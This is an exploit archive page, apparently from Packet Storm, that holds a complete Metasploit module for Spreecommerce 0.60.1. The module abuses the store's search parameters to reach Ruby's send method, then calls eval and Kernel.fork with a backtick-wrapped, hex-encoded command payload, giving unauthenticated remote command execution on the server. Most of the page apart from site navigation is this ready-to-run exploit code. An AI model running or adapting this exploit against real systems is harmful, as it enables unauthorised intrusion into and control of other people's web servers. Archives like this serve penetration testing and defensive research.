Spreecommerce 0.60.1 Arbitrary Command Execution

Spreecommerce 0.60.1 Arbitrary Command Execution: Posted Oct 10, 2011; Authored by joernchen | Site metasploit.com; This Metasploit module exploits an arbitrary command execution vulnerability in the Spreecommerce search. Unvalidated input is called via the Ruby send method allowing command execution.; tags | exploit, arbitrary, ruby; advisories | OSVDB-76011; SHA-256 | d3108b6b1413b6aeeeff914cbc18a85d9770bf726d64b72125ff0d155c918d7a; Download | Favorite | View

Spreecommerce 0.60.1 Arbitrary Command Execution

##
# $Id: spree_search_exec.rb 13831 2011-10-07 17:45:15Z sinn3r $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Spreecommerce 0.60.1 Arbitrary Command Execution',
      'Description'    => %q{
          This module exploits an arbitrary command execution vulnerability in the
          Spreecommerce search. Unvalidated input is called via the 
          Ruby send method allowing command execution.
      },
      'Author'         => [ 'joernchen <joernchen[at]phenoelit.de>' ], #Phenoelit
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: 13831 $',
      'References'     =>
        [
          [ 'OSVDB', '76011'],
          [ 'URL', 'http://spreecommerce.com/blog/2011/10/05/remote-command-product-group/' ],
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'BadChars' => "\x60",
          'DisableNops' => true,
          'Space'       => 31337,
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
            }
        },
      'Platform'       => [ 'unix', 'linux' ],
      'Arch'           => ARCH_CMD,
      'Targets'        => [[ 'Automatic', { }]],
      'DefaultTarget'  => 0))

      register_options(
        [
          OptString.new('URI', [true, "The path to the Spreecommerce main site", "/"]),
        ], self.class)
  end

  def exploit
    command = Rex::Text.uri_encode(payload.raw, 'hex-all')
    res = send_request_raw({
      'uri'     => datastore['URI']+ "?search[send][]=eval&search[send][]=Kernel.fork%20do%60#{command}%60end",
      'method'  => 'GET',
      'headers' =>
      {
        'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
        'Connection' => 'Close',
      }
    }, 0.4 ) #short timeout, we don't care about the response
      
    if (res)
      print_status("The server returned: #{res.code} #{res.message}")
    end
      
    handler
  end

end

Top Authors In Last 30 Days

Red Hat 219 files
Ubuntu 85 files
indoushka 77 files
Jasper Nota 25 files
Gentoo 22 files
Debian 19 files
Willem Westerhof 19 files
Jim Blankendaal 11 files
Martijn Baalman 9 files
Apple 9 files

File Archives

Systems

AIX (429)
Apple (2,099)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,096)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,553)
HPUX (880)
iOS (378)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,689)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,482)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,736)
UNIX (9,435)
UnixWare (187)
Windows (6,671)
Other

Spreecommerce 0.60.1 Arbitrary Command Execution

Spreecommerce 0.60.1 Arbitrary Command Execution

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Spreecommerce 0.60.1 Arbitrary Command Execution

Share This

Spreecommerce 0.60.1 Arbitrary Command Execution

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems